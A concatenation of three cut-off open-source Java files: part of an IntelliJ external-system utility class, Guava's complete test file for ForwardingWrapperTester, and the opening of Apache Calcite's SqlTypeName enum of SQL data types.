* <li>this is a new project being created (import project from external model);</li>
* <li>a new module is being imported from an external project into an existing ide project;</li>
* </ul>
* </pre>
* This method allows to differentiate between them (e.g. we don't want to change language level when new module is imported to
* an existing project).
*
* @return <code>true</code> if new project is being imported; <code>false</code> if new module is being imported
*/
public static boolean isNewProjectConstruction() {
return ProjectManager.getInstance().getOpenProjects().length == 0;
}
@NotNull
public static String getLastUsedExternalProjectPath(@NotNull ProjectSystemId externalSystemId) {
return PropertiesComponent.getInstance().getValue(LAST_USED_PROJECT_PATH_PREFIX + externalSystemId.getReadableName(), "");
}
public static void storeLastUsedExternalProjectPath(@Nullable String path, @NotNull ProjectSystemId externalSystemId) {
if (path != null) {
PropertiesComponent.getInstance().setValue(LAST_USED_PROJECT_PATH_PREFIX + externalSystemId.getReadableName(), path);
}
}
@NotNull
public static String getProjectRepresentationName(@NotNull String targetProjectPath, @Nullable String rootProjectPath) {
if (rootProjectPath == null) {
File rootProjectDir = new File(targetProjectPath);
if (rootProjectDir.isFile()) {
rootProjectDir = rootProjectDir.getParentFile();
}
return rootProjectDir.getName();
}
File rootProjectDir = new File(rootProjectPath);
if (rootProjectDir.isFile()) {
rootProjectDir = rootProjectDir.getParentFile();
}
File targetProjectDir = new File(targetProjectPath);
if (targetProjectDir.isFile()) {
targetProjectDir = targetProjectDir.getParentFile();
}
StringBuilder buffer = new StringBuilder();
for (File f = targetProjectDir; f != null && !FileUtil.filesEqual(f, rootProjectDir); f = f.getParentFile()) {
buffer.insert(0, f.getName()).insert(0, ":");
}
buffer.insert(0, rootProjectDir.getName());
return buffer.toString();
}
/**
* There is a possible case that external project linked to an ide project is a multi-project, i.e. contains more than one
* module.
* <p/>
* This method tries to find root project's config path assuming that given path points to a sub-project's config path.
*
* @param externalProjectPath external sub-project's config path
* @param externalSystemId target external system
* @param project target ide project
* @return root external project's path if given path is considered to point to a known sub-project's config;
* <code>null</code> if it's not possible to find a root project's config path on the basis of the
* given path
*/
@Nullable
public static String getRootProjectPath(@NotNull String externalProjectPath,
@NotNull ProjectSystemId externalSystemId,
@NotNull Project project)
{
ExternalSystemManager<?, ?, ?, ?, ?> manager = getManager(externalSystemId);
if (manager == null) {
return null;
}
if (manager instanceof ExternalSystemAutoImportAware) {
return ((ExternalSystemAutoImportAware)manager).getAffectedExternalProjectPath(externalProjectPath, project);
}
return null;
}
/**
* {@link RemoteUtil#unwrap(Throwable) unwraps} given exception if possible and builds error message for it.
*
* @param e exception to process
* @return error message for the given exception
*/
@SuppressWarnings({"ThrowableResultOfMethodCallIgnored", "IOResourceOpenedButNotSafelyClosed"})
@NotNull
public static String buildErrorMessage(@NotNull Throwable e) {
Throwable unwrapped = RemoteUtil.unwrap(e);
String reason = unwrapped.getLocalizedMessage();
if (!StringUtil.isEmpty(reason)) {
return reason;
}
else if (unwrapped.getClass() == ExternalSystemException.class) {
return String.format("exception during working with external system: %s", ((ExternalSystemException)unwrapped).getOriginalReason());
}
else {
StringWriter writer = new StringWriter();
unwrapped.printStackTrace(new PrintWriter(writer));
return writer.toString();
}
}
}
|
|
/*
* Copyright (C) 2012 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.testing.anotherpackage;
import static com.google.common.truth.Truth.assertThat;
import com.google.common.base.Equivalence;
import com.google.common.base.Function;
import com.google.common.base.Functions;
import com.google.common.base.Joiner;
import com.google.common.base.Predicate;
import com.google.common.collect.Ordering;
import com.google.common.primitives.UnsignedInteger;
import com.google.common.primitives.UnsignedLong;
import com.google.common.testing.ForwardingWrapperTester;
import com.google.common.testing.NullPointerTester;
import java.io.InputStream;
import java.nio.charset.Charset;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;
import junit.framework.AssertionFailedError;
import junit.framework.TestCase;
/**
* Tests for {@link ForwardingWrapperTester}. Live in a different package to detect reflection
* access issues, if any.
*
* @author Ben Yu
*/
public class ForwardingWrapperTesterTest extends TestCase {
private final ForwardingWrapperTester tester = new ForwardingWrapperTester();
public void testGoodForwarder() {
tester.testForwarding(
Arithmetic.class,
new Function<Arithmetic, Arithmetic>() {
@Override
public Arithmetic apply(Arithmetic arithmetic) {
return new ForwardingArithmetic(arithmetic);
}
});
tester.testForwarding(
ParameterTypesDifferent.class,
new Function<ParameterTypesDifferent, ParameterTypesDifferent>() {
@Override
public ParameterTypesDifferent apply(ParameterTypesDifferent delegate) {
return new ParameterTypesDifferentForwarder(delegate);
}
});
}
public void testVoidMethodForwarding() {
tester.testForwarding(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable);
}
});
}
public void testToStringForwarding() {
tester.testForwarding(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public String toString() {
return runnable.toString();
}
};
}
});
}
public void testFailsToForwardToString() {
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public String toString() {
return "";
}
};
}
},
"toString()");
}
public void testFailsToForwardHashCode() {
tester.includingEquals();
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public boolean equals(Object o) {
if (o instanceof ForwardingRunnable) {
ForwardingRunnable that = (ForwardingRunnable) o;
return runnable.equals(that.runnable);
}
return false;
}
};
}
},
"Runnable");
}
public void testEqualsAndHashCodeForwarded() {
tester.includingEquals();
tester.testForwarding(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public boolean equals(Object o) {
if (o instanceof ForwardingRunnable) {
ForwardingRunnable that = (ForwardingRunnable) o;
return runnable.equals(that.runnable);
}
return false;
}
@Override
public int hashCode() {
return runnable.hashCode();
}
};
}
});
}
public void testFailsToForwardEquals() {
tester.includingEquals();
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public int hashCode() {
return runnable.hashCode();
}
};
}
},
"Runnable");
}
public void testFailsToForward() {
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public void run() {}
};
}
},
"run()",
"Failed to forward");
}
public void testRedundantForwarding() {
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new Runnable() {
@Override
public void run() {
runnable.run();
runnable.run();
}
};
}
},
"run()",
"invoked more than once");
}
public void testFailsToForwardParameters() {
assertFailure(
Adder.class,
new Function<Adder, Adder>() {
@Override
public Adder apply(Adder adder) {
return new FailsToForwardParameters(adder);
}
},
"add(",
"Parameter #0");
}
public void testForwardsToTheWrongMethod() {
assertFailure(
Arithmetic.class,
new Function<Arithmetic, Arithmetic>() {
@Override
public Arithmetic apply(Arithmetic adder) {
return new ForwardsToTheWrongMethod(adder);
}
},
"minus");
}
public void testFailsToForwardReturnValue() {
assertFailure(
Adder.class,
new Function<Adder, Adder>() {
@Override
public Adder apply(Adder adder) {
return new FailsToForwardReturnValue(adder);
}
},
"add(",
"Return value");
}
public void testFailsToPropagateException() {
assertFailure(
Adder.class,
new Function<Adder, Adder>() {
@Override
public Adder apply(Adder adder) {
return new FailsToPropagageException(adder);
}
},
"add(",
"exception");
}
public void testNotInterfaceType() {
try {
new ForwardingWrapperTester().testForwarding(String.class, Functions.<String>identity());
fail();
} catch (IllegalArgumentException expected) {
}
}
public void testNulls() {
new NullPointerTester()
.setDefault(Class.class, Runnable.class)
.testAllPublicInstanceMethods(new ForwardingWrapperTester());
}
private <T> void assertFailure(
Class<T> interfaceType,
Function<T, ? extends T> wrapperFunction,
String... expectedMessages) {
try {
tester.testForwarding(interfaceType, wrapperFunction);
} catch (AssertionFailedError expected) {
for (String message : expectedMessages) {
assertThat(expected.getMessage()).contains(message);
}
return;
}
fail("expected failure not reported");
}
private class ForwardingRunnable implements Runnable {
private final Runnable runnable;
ForwardingRunnable(Runnable runnable) {
this.runnable = runnable;
}
@Override
public void run() {
runnable.run();
}
@Override
public String toString() {
return runnable.toString();
}
}
private interface Adder {
int add(int a, int b);
}
private static class ForwardingArithmetic implements Arithmetic {
private final Arithmetic arithmetic;
public ForwardingArithmetic(Arithmetic arithmetic) {
this.arithmetic = arithmetic;
}
@Override
public int add(int a, int b) {
return arithmetic.add(a, b);
}
@Override
public int minus(int a, int b) {
return arithmetic.minus(a, b);
}
@Override
public String toString() {
return arithmetic.toString();
}
}
private static class FailsToForwardParameters implements Adder {
private final Adder adder;
FailsToForwardParameters(Adder adder) {
this.adder = adder;
}
@Override
public int add(int a, int b) {
return adder.add(b, a);
}
@Override
public String toString() {
return adder.toString();
}
}
private static class FailsToForwardReturnValue implements Adder {
private final Adder adder;
FailsToForwardReturnValue(Adder adder) {
this.adder = adder;
}
@Override
public int add(int a, int b) {
return adder.add(a, b) + 1;
}
@Override
public String toString() {
return adder.toString();
}
}
private static class FailsToPropagageException implements Adder {
private final Adder adder;
FailsToPropagageException(Adder adder) {
this.adder = adder;
}
@Override
public int add(int a, int b) {
try {
return adder.add(a, b);
} catch (Exception e) {
// swallow!
return 0;
}
}
@Override
public String toString() {
return adder.toString();
}
}
public interface Arithmetic extends Adder {
int minus(int a, int b);
}
private static class ForwardsToTheWrongMethod implements Arithmetic {
private final Arithmetic arithmetic;
ForwardsToTheWrongMethod(Arithmetic arithmetic) {
this.arithmetic = arithmetic;
}
@Override
public int minus(int a, int b) { // bad!
return arithmetic.add(a, b);
}
@Override
public int add(int a, int b) {
return arithmetic.add(a, b);
}
@Override
public String toString() {
return arithmetic.toString();
}
}
private interface ParameterTypesDifferent {
void foo(
String s,
Runnable r,
Number n,
Iterable<?> it,
boolean b,
Equivalence<String> eq,
Exception e,
InputStream in,
Comparable<?> c,
Ordering<Integer> ord,
Charset charset,
TimeUnit unit,
Class<?> cls,
Joiner joiner,
Pattern pattern,
UnsignedInteger ui,
UnsignedLong ul,
StringBuilder sb,
Predicate<?> pred,
Function<?, ?> func,
Object obj);
}
private static class ParameterTypesDifferentForwarder implements ParameterTypesDifferent {
private final ParameterTypesDifferent delegate;
public ParameterTypesDifferentForwarder(ParameterTypesDifferent delegate) {
this.delegate = delegate;
}
@Override
public void foo(
String s,
Runnable r,
Number n,
Iterable<?> it,
boolean b,
Equivalence<String> eq,
Exception e,
InputStream in,
Comparable<?> c,
Ordering<Integer> ord,
Charset charset,
TimeUnit unit,
Class<?> cls,
Joiner joiner,
Pattern pattern,
UnsignedInteger ui,
UnsignedLong ul,
StringBuilder sb,
Predicate<?> pred,
Function<?, ?> func,
Object obj) {
delegate.foo(
s, r, n, it, b, eq, e, in, c, ord, charset, unit, cls, joiner, pattern, ui, ul, sb, pred,
func, obj);
}
@Override
public String toString() {
return delegate.toString();
}
}
public void testCovariantReturn() {
new ForwardingWrapperTester()
.testForwarding(
Sub.class,
new Function<Sub, Sub>() {
@Override
public Sub apply(Sub sub) {
return new ForwardingSub(sub);
}
});
}
interface Base {
CharSequence getId();
}
interface Sub extends Base {
@Override
String getId();
}
private static class ForwardingSub implements Sub {
private final Sub delegate;
ForwardingSub(Sub delegate) {
this.delegate = delegate;
}
@Override
public String getId() {
return delegate.getId();
}
@Override
public String toString() {
return delegate.toString();
}
}
private interface Equals {
@Override
boolean equals(Object obj);
@Override
int hashCode();
@Override
String toString();
}
private static class NoDelegateToEquals implements Equals {
private static Function<Equals, Equals> WRAPPER =
new Function<Equals, Equals>() {
@Override
public NoDelegateToEquals apply(Equals delegate) {
return new NoDelegateToEquals(delegate);
}
};
private final Equals delegate;
NoDelegateToEquals(Equals delegate) {
this.delegate = delegate;
}
@Override
public String toString() {
return delegate.toString();
}
}
public void testExplicitEqualsAndHashCodeNotDelegatedByDefault() {
new ForwardingWrapperTester().testForwarding(Equals.class, NoDelegateToEquals.WRAPPER);
}
public void testExplicitEqualsAndHashCodeDelegatedWhenExplicitlyAsked() {
try {
new ForwardingWrapperTester()
.includingEquals()
.testForwarding(Equals.class, NoDelegateToEquals.WRAPPER);
} catch (AssertionFailedError expected) {
return;
}
fail("Should have failed");
}
/** An interface for the 2 ways that a chaining call might be defined. */
private interface ChainingCalls {
// A method that is defined to 'return this'
ChainingCalls chainingCall();
// A method that just happens to return a ChainingCalls object
ChainingCalls nonChainingCall();
}
private static class ForwardingChainingCalls implements ChainingCalls {
final ChainingCalls delegate;
ForwardingChainingCalls(ChainingCalls delegate) {
this.delegate = delegate;
}
@Override
public ForwardingChainingCalls chainingCall() {
delegate.chainingCall();
return this;
}
@Override
public ChainingCalls nonChainingCall() {
return delegate.nonChainingCall();
}
@Override
public String toString() {
return delegate.toString();
}
}
public void testChainingCalls() {
tester.testForwarding(
ChainingCalls.class,
new Function<ChainingCalls, ChainingCalls>() {
@Override
public ChainingCalls apply(ChainingCalls delegate) {
return new ForwardingChainingCalls(delegate);
}
});
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to you under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.calcite.sql.type;
import org.apache.calcite.avatica.util.TimeUnit;
import org.apache.calcite.sql.SqlLiteral;
import org.apache.calcite.sql.parser.SqlParserPos;
import org.apache.calcite.util.DateString;
import org.apache.calcite.util.TimeString;
import org.apache.calcite.util.TimestampString;
import org.apache.calcite.util.Util;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.Iterables;
import com.google.common.collect.Sets;
import java.math.BigDecimal;
import java.sql.Types;
import java.util.Arrays;
import java.util.Calendar;
import java.util.List;
import java.util.Map;
import java.util.Set;
/**
* Enumeration of the type names which can be used to construct a SQL type.
* Rationale for this class's existence (instead of just using the standard
* java.sql.Type ordinals):
*
* <ul>
* <li>{@link java.sql.Types} does not include all SQL2003 data-types;
* <li>SqlTypeName provides a type-safe enumeration;
* <li>SqlTypeName provides a place to hang extra information such as whether
* the type carries precision and scale.
* </ul>
*/
public enum SqlTypeName {
BOOLEAN(PrecScale.NO_NO, false, Types.BOOLEAN, SqlTypeFamily.BOOLEAN),
TINYINT(PrecScale.NO_NO, false, Types.TINYINT, SqlTypeFamily.NUMERIC),
SMALLINT(PrecScale.NO_NO, false, Types.SMALLINT, SqlTypeFamily.NUMERIC),
INTEGER(PrecScale.NO_NO, false, Types.INTEGER, SqlTypeFamily.NUMERIC),
BIGINT(PrecScale.NO_NO, false, Types.BIGINT, SqlTypeFamily.NUMERIC),
DECIMAL(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES, false,
Types.DECIMAL, SqlTypeFamily.NUMERIC),
FLOAT(PrecScale.NO_NO, false, Types.FLOAT, SqlTypeFamily.NUMERIC),
REAL(PrecScale.NO_NO, false, Types.REAL, SqlTypeFamily.NUMERIC),
DOUBLE(PrecScale.NO_NO, false, Types.DOUBLE, SqlTypeFamily.NUMERIC),
DATE(PrecScale.NO_NO, false, Types.DATE, SqlTypeFamily.DATE),
TIME(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.TIME,
SqlTypeFamily.TIME),
TIME_WITH_LOCAL_TIME_ZONE(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.OTHER,
SqlTypeFamily.TIME),
TIMESTAMP(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.TIMESTAMP,
SqlTypeFamily.TIMESTAMP),
TIMESTAMP_WITH_LOCAL_TIME_ZONE(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.OTHER,
SqlTypeFamily.TIMESTAMP),
INTERVAL_YEAR(PrecScale.NO_NO, false, Types.OTHER,
SqlTypeFamily.INTERVAL_YEAR_MONTH),
INTERVAL_YEAR_MONTH(PrecScale.NO_NO, false, Types.OTHER,
SqlTypeFamily.INTERVAL_YEAR_MONTH),
INTERVAL_MONTH(PrecScale.NO_NO, false, Types.OTHER,
SqlTypeFamily.INTERVAL_YEAR_MONTH),
INTERVAL_DAY(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_DAY_HOUR(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_DAY_MINUTE(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_DAY_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_HOUR(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_HOUR_MINUTE(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_HOUR_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_MINUTE(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_MINUTE_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
CHAR(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.CHAR,
SqlTypeFamily.CHARACTER),
VARCHAR(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.VARCHAR,
SqlTypeFamily.CHARACTER),
BINARY(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.BINARY,
SqlTypeFamily.BINARY),
VARBINARY(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.VARBINARY,
SqlTypeFamily.BINARY),
NULL(PrecScale.NO_NO, true, Types.NULL, SqlTypeFamily.NULL),
ANY(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES, true,
Types.JAVA_OBJECT, SqlTypeFamily.ANY),
SYMBOL(PrecScale.NO_NO, true, Types.OTHER, null),
MULTISET(PrecScale.NO_NO, false, Types.ARRAY, SqlTypeFamily.MULTISET),
ARRAY(PrecScale.NO_NO, false, Types.ARRAY, SqlTypeFamily.ARRAY),
MAP(PrecScale.NO_NO, false, Types.OTHER, SqlTypeFamily.MAP),
DISTINCT(PrecScale.NO_NO, false, Types.DISTINCT, null),
STRUCTURED(PrecScale.NO_NO, false, Types.STRUCT, null),
ROW(PrecScale.NO_NO, false, Types.STRUCT, null),
OTHER(PrecScale.NO_NO, false, Types.OTHER, null),
CURSOR(PrecScale.NO_NO, false, ExtraSqlTypes.REF_CURSOR,
SqlTypeFamily.CURSOR),
COLUMN_LIST(PrecScale.NO_NO, false, Types.OTHER + 2,
SqlTypeFamily.COLUMN_LIST),
DYNAMIC_STAR(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES, true,
Types.JAVA_OBJECT, SqlTypeFamily.ANY),
GEOMETRY(PrecScale.NO_NO, true, ExtraSqlTypes.GEOMETRY, SqlTypeFamily.GEO);
public static final int MAX_DATETIME_PRECISION = 3;
// Minimum and default interval precisions are defined by SQL2003
// Maximum interval precisions are implementation dependent,
// but must be at least the default value
public static final int DEFAULT_INTERVAL_START_PRECISION = 2;
public static final int DEFAULT_INTERVAL_FRACTIONAL_SECOND_PRECISION = 6;
public static final int MIN_INTERVAL_START_PRECISION = 1;
public static final int MIN_INTERVAL_FRACTIONAL_SECOND_PRECISION = 1;
public static final int MAX_INTERVAL_START_PRECISION = 10;
public static final int MAX_INTERVAL_FRACTIONAL_SECOND_PRECISION = 9;
// Cached map of enum values
private static final Map<String, SqlTypeName> VALUES_MAP =
Util.enumConstants(SqlTypeName.class);
// categorizations used by SqlTypeFamily definitions
// you probably want to use JDK 1.5 support for treating enumeration
// as collection instead; this is only here to support
// SqlTypeFamily.ANY
public static final List<SqlTypeName> ALL_TYPES =
ImmutableList.of(
BOOLEAN, INTEGER, VARCHAR, DATE, TIME, TIMESTAMP, NULL, DECIMAL,
ANY, CHAR, BINARY, VARBINARY, TINYINT, SMALLINT, BIGINT, REAL,
DOUBLE, SYMBOL, INTERVAL_YEAR, INTERVAL_YEAR_MONTH, INTERVAL_MONTH,
INTERVAL_DAY, INTERVAL_DAY_HOUR, INTERVAL_DAY_MINUTE,
INTERVAL_DAY_SECOND, INTERVAL_HOUR, INTERVAL_HOUR_MINUTE,
INTERVAL_HOUR_SECOND, INTERVAL_MINUTE, INTERVAL_MINUTE_SECOND,
INTERVAL_SECOND, TIME_WITH_LOCAL_TIME_ZONE, TIMESTAMP_WITH_LOCAL_TIME_ZONE,
FLOAT, MULTISET, DISTINCT, STRUCTURED, ROW, CURSOR, COLUMN_LIST);
public static final List<SqlTypeName> BOOLEAN_TYPES =
ImmutableList.of(BOOLEAN);
public static final List<SqlTypeName> BINARY_TYPES =
ImmutableList.of(BINARY, VARBINARY);
public static final List<SqlTypeName> INT_TYPES =
ImmutableList.of(TINYINT, SMALLINT, INTEGER, BIGINT);
public static final List<SqlTypeName> EXACT_TYPES =
combine(INT_TYPES, ImmutableList.of(DECIMAL));
public static final List<SqlTypeName> APPROX_TYPES =
ImmutableList.of(FLOAT, REAL, DOUBLE);
public static final List<SqlTypeName> NUMERIC_TYPES =
combine(EXACT_TYPES, APPROX_TYPES);
public static final List<SqlTypeName> FRACTIONAL_TYPES =
combine(APPROX_TYPES, ImmutableList.of(DECIMAL));
public static final List<SqlTypeName> CHAR_TYPES =
ImmutableList.of(CHAR, VARCHAR);
public static final List<SqlTypeName> STRING_TYPES =
combine(CHAR_TYPES, BINARY_TYPES);
public static final List<SqlTypeName> DATETIME_TYPES =
ImmutableList.of(DATE, TIME, TIME_WITH_LOCAL_TIME_ZONE,
TIMESTAMP, TIMESTAMP_WITH_LOCAL_TIME_ZONE);
public static final Set<SqlTypeName> YEAR_INTERVAL_TYPES =
Sets.immutableEnumSet(SqlTypeName.INTERVAL_YEAR,
SqlTypeName.INTERVAL_YEAR_MONTH,
SqlTypeName.INTERVAL_MONTH);
public static final Set<SqlTypeName> DAY_INTERVAL_TYPES =
Sets.immutableEnumSet(SqlTypeName.INTERVAL_DAY,
SqlTypeName.INTERVAL_DAY_HOUR,
SqlTypeName.INTERVAL_DAY_MINUTE,
SqlTypeName.INTERVAL_DAY_SECOND,
SqlTypeName.INTERVAL_HOUR,
SqlTypeName.INTERVAL_HOUR_MINUTE,
SqlTypeName.INTERVAL_HOUR_SECOND,
SqlTypeName.INTERVAL_MINUTE,
SqlTypeName.INTERVAL_MINUTE_SECOND,
SqlTypeName.INTERVAL_SECOND);
public static final Set<SqlTypeName> INTERVAL_TYPES =
Sets.immutableEnumSet(
Iterables.concat(YEAR_INTERVAL_TYPES, DAY_INTERVAL_TYPES));
private static final Map<Integer, SqlTypeName> JDBC_TYPE_TO_NAME =
ImmutableMap.<Integer, SqlTypeName>builder()
.put(Types.TINYINT, TINYINT)
.put(Types.SMALLINT, SMALLINT)
.put(Types.BIGINT, BIGINT)
.put(Types.INTEGER, INTEGER)
.put(Types.NUMERIC, DECIMAL) // REVIEW
.put(Types.DECIMAL, DECIMAL)
.put(Types.FLOAT, FLOAT)
.put(Types.REAL, REAL)
.put(Types.DOUBLE, DOUBLE)
.put(Types.CHAR, CHAR)
.put(Types.VARCHAR, VARCHAR)
// TODO: provide real support for these eventually
.put(ExtraSqlTypes.NCHAR, CHAR)
.put(ExtraSqlTypes.NVARCHAR, VARCHAR)
// TODO: additional types not yet supported. See ExtraSqlTypes.
// .put(Types.LONGVARCHAR, Longvarchar)
// .put(Types.CLOB, Clob)
// .put(Types.LONGVARBINARY, Longvarbinary)
// .put(Types.BLOB, Blob)
// .put(Types.LONGNVARCHAR, Longnvarchar)
// .put(Types.NCLOB, Nclob)
// .put(Types.ROWID, Rowid)
// .put(Types.SQLXML, Sqlxml)
.put(Types.BINARY, BINARY)
.put(Types.VARBINARY, VARBINARY)
.put(Types.DATE, DATE)
.put(Types.TIME, TIME)
.put(Types.TIMESTAMP, TIMESTAMP)
.put(Types.BIT, BOOLEAN)
.put(Types.BOOLEAN, BOOLEAN)
.put(Types.DISTINCT, DISTINCT)
.put(Types.STRUCT, STRUCTURED)
.put(Types.ARRAY, ARRAY)
.build();
/**
* Bitwise-or of flags indicating allowable precision/scale combinations.
*/
private final int signatures;
/**
* Returns true if not of a "pure" standard sql type. "Inpure" types are
* {@link #ANY}, {@link #NULL} and {@link #SYMBOL}
*/
private final boolean special;
private final int jdbcOrdinal;
private final SqlTypeFamily family;
SqlTypeName(int signatures, boolean special, int jdbcType,
SqlTypeFamily family) {
this.signatures = signatures;
this.special = special;
this.jdbcOrdinal = jdbcType;
this.family = family;
}
/**
* Looks up a type name from its name.
*
* @return Type name, or null if not found
*/
public static SqlTypeName get(String name) {
if (false) {
// The following code works OK, but the spurious exceptions are
// annoying.
try {
return SqlTypeName.valueOf(name);
} catch (IllegalArgumentException e) {
return null;
}
}
return VALUES_MAP.get(name);
}
public boolean allowsNoPrecNoScale() {
return (signatures & PrecScale.NO_NO) != 0;
}
public boolean allowsPrecNoScale() {
return (signatures & PrecScale.YES_NO) != 0;
}
public boolean allowsPrec() {
return allowsPrecScale(true, true)
|| allowsPrecScale(true, false);
}
public boolean allowsScale() {
return allowsPrecScale(true, true);
}
/**
* Returns whether this type can be specified with a given combination of
* precision and scale. For example,
*
* <ul>
* <li><code>Varchar.allowsPrecScale(true, false)</code> returns <code>
* true</code>, because the VARCHAR type allows a precision parameter, as in
* <code>VARCHAR(10)</code>.</li>
* <li><code>Varchar.allowsPrecScale(true, true)</code> returns <code>
* true</code>, because the VARCHAR type does not allow a precision and a
* scale parameter, as in <code>VARCHAR(10, 4)</code>.</li>
* <li><code>allowsPrecScale(false, true)</code> returns <code>false</code>
* for every type.</li>
* </ul>
*
* @param precision Whether the precision/length field is part of the type
* specification
* @param scale Whether the scale field is part of the type specification
* @return Whether this combination of precision/scale is valid
*/
public boolean allowsPrecScale(
boolean precision,
boolean scale) {
int mask =
precision ? (scale ? PrecScale.YES_YES : PrecScale.YES_NO)
: (scale ? 0 : PrecScale.NO_NO);
return (signatures & mask) != 0;
}
public boolean isSpecial() {
return special;
}
/** Returns the ordinal from {@link java.sql.Types} corresponding to this
* SqlTypeName. */
public int getJdbcOrdinal() {
return jdbcOrdinal;
}
private static List<SqlTypeName> combine(
List<SqlTypeName> list0,
List<SqlTypeName> list1) {
return ImmutableList.<SqlTypeName>builder()
.addAll(list0)
.addAll(list1)
.build();
}
/** Returns the default scale for this type if supported, otherwise -1 if
* scale is either unsupported or must be specified explicitly. */
public int getDefaultScale() {
switch (this) {
case DECIMAL:
return 0;
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return DEFAULT_INTERVAL_FRACTIONAL_SECOND_PRECISION;
default:
return -1;
}
}
/**
* Gets the SqlTypeFamily containing this SqlTypeName.
*
* @return containing family, or null for none
*/
public SqlTypeFamily getFamily() {
return family;
}
/**
* Gets the SqlTypeName corresponding to a JDBC type.
*
* @param jdbcType the JDBC type of interest
* @return corresponding SqlTypeName, or null if the type is not known
*/
public static SqlTypeName getNameForJdbcType(int jdbcType) {
return JDBC_TYPE_TO_NAME.get(jdbcType);
}
/**
* Returns the limit of this datatype. For example,
*
* <table border="1">
* <caption>Datatype limits</caption>
* <tr>
* <th>Datatype</th>
* <th>sign</th>
* <th>limit</th>
* <th>beyond</th>
* <th>precision</th>
* <th>scale</th>
* <th>Returns</th>
* </tr>
* <tr>
* <td>Integer</td>
* <td>true</td>
* <td>true</td>
* <td>false</td>
* <td>-1</td>
* <td>-1</td>
* <td>2147483647 (2 ^ 31 -1 = MAXINT)</td>
* </tr>
* <tr>
* <td>Integer</td>
* <td>true</td>
* <td>true</td>
* <td>true</td>
* <td>-1</td>
* <td>-1</td>
* <td>2147483648 (2 ^ 31 = MAXINT + 1)</td>
* </tr>
* <tr>
* <td>Integer</td>
* <td>false</td>
* <td>true</td>
* <td>false</td>
* <td>-1</td>
